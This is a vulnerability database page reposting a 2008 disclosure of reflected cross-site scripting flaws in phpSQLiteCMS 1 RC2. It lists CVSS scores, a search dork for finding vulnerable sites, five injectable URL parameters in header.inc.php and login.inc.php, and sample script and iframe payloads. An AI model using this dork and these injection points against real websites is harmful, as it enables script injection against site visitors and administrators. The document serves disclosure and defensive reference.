phpSQLiteCMS Multiple Remote XSS Vulnerability

2009.03.13
Credit: CWH
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

========================================================== phpSQLiteCMS Multiple Remote XSS Vulnerability ========================================================== AUTHOR : CWH Underground DATE : 21 May 2008 SITE : www.citec.us ##################################################### APPLICATION : phpSQLiteCMS VERSION : 1 RC2 (Lastest Version) VENDOR : http://downloads.sourceforge.net/phpsqlitecms ##################################################### DORK: "Powered By phpSQLiteCMS" ---Exploit--- [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[hom e]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[adm in_menu]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/header.inc.php?lang[adm in_menu_page_overview]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[logi n_username]=<XSS> [-] http://[target]/[phpsqlitecms_path]/cms/includes/login.inc.php?lang[logi n_password]=<XSS> Example for XSS : <script>alert(123);</script> <iframe src=http://www.google.com> . ################################################################## Greetz: ZeQ3uL,BAD $ectors, Snapter, Conan, Win7dos, JabAv0C ##################################################################

References:

http://xforce.iss.net/xforce/xfdb/42585
http://www.securityfocus.com/bid/29338
http://www.securityfocus.com/archive/1/archive/1/492446/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top